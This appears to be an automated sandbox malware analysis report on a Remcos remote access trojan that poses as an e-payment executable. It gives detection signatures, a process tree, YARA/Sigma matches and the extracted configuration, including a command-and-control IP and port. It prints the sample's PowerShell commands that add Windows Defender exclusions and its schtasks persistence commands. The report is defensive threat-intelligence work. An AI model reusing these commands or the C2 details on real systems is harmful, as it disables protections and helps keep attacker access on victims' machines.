Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-Payment.NET.CMS4006975815.exe

Overview

General Information

Sample name:e-Payment.NET.CMS4006975815.exe
Analysis ID:1465312
MD5:b16699f8fd5e68de16d8904ec7cd3ed2
SHA1:45fac6b1832fad2fef90e1064ab4e78e0b164737
SHA256:d21d0451a7a8b112776118d88154bf7eab2703b13bf6ae1dcaec2f959bf42305
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • e-Payment.NET.CMS4006975815.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe" MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • JXHPwNYzysUjKo.exe (PID: 8008 cmdline: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
    • schtasks.exe (PID: 8176 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JXHPwNYzysUjKo.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe" MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "62.102.148.166:3319", "Assigned name": "banksy", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_rpklfmytvo", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "egsy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmpRemcosdetect Remcos in memoryJPCERT/CC Incident Response Group
    • 0x11454:$remcos: Remcos
    • 0x11cc8:$remcos: Remcos
    • 0x28474:$remcos: Remcos
    • 0x28ce8:$remcos: Remcos
    • 0x11d00:$url: Breaking-Security.Net
    • 0x28d20:$url: Breaking-Security.Net
    • 0x1650a:$resource: SETTINGS
    • 0x2d52a:$resource: SETTINGS
    0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x114dc:$funcs1: autogetofflinelogs
            • 0x114c0:$funcs2: clearlogins
            • 0x114f0:$funcs3: getofflinelogs
            • 0x11578:$funcs4: execcom
            • 0x114cc:$funcs5: deletekeylog
            • 0x11798:$funcs6: remscriptexecd
            • 0x115bc:$funcs7: getwindows
            • 0x10da0:$funcs8: fundlldata
            • 0x10d78:$funcs9: getfunlib
            • 0x107ec:$funcs10: autofflinelogs
            • 0x113b8:$funcs11: getclipboard
            • 0x114b4:$funcs12: getscrslist
            • 0x107e0:$funcs13: offlinelogs
            • 0x105c8:$funcs14: getcamsingleframe
            • 0x116e4:$funcs15: listfiles
            • 0x115e0:$funcs16: getproclist
            • 0x10828:$funcs17: onlinelogs
            • 0x11700:$funcs18: getdrives
            • 0x11784:$funcs19: remscriptsuccess
            • 0x10600:$funcs20: getcamframe
            • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
            9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpackRemcos_1Remcos Payloadkevoreilly
            • 0x11034:$name: Remcos
            • 0x118a8:$name: Remcos
            • 0x118fb:$name: REMCOS
            • 0x10688:$time: %02i:%02i:%02i:%03i
            • 0x11320:$time: %02i:%02i:%02i:%03i
            • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 06 47 3B 7D 0C 72
            9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpackRemcosdetect Remcos in memoryJPCERT/CC Incident Response Group
            • 0x11034:$remcos: Remcos
            • 0x118a8:$remcos: Remcos
            • 0x118e0:$url: Breaking-Security.Net
            • 0x160ea:$resource: SETTINGS
            9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x10738:$s1: \Classes\mscfile\shell\open\command
            • 0x10720:$s2: eventvwr.exe
            Click to see the 45 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ProcessId: 7656, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ProcessId: 7656, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, ParentImage: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, ParentProcessId: 8008, ParentProcessName: JXHPwNYzysUjKo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp", ProcessId: 8176, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", ProcessId: 7760, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ProcessId: 7656, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe", ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp", ProcessId: 7760, ProcessName: schtasks.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: [u...}7|.....KR.{G.9~.?.$....ui.R":G.v.^$3[QJ....@...., EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ProcessId: 7948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\remcos_rpklfmytvo\EXEpath

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: e-Payment.NET.CMS4006975815.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeAvira: detection malicious, Label: HEUR/AGEN.1308647
            Found malware configuration
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "62.102.148.166:3319", "Assigned name": "banksy", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_rpklfmytvo", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "egsy"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeReversingLabs: Detection: 42%
            Multi AV Scanner detection for submitted file
            Source: e-Payment.NET.CMS4006975815.exeReversingLabs: Detection: 42%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: e-Payment.NET.CMS4006975815.exeJoe Sandbox ML: detected
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs13_2_00402C45
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@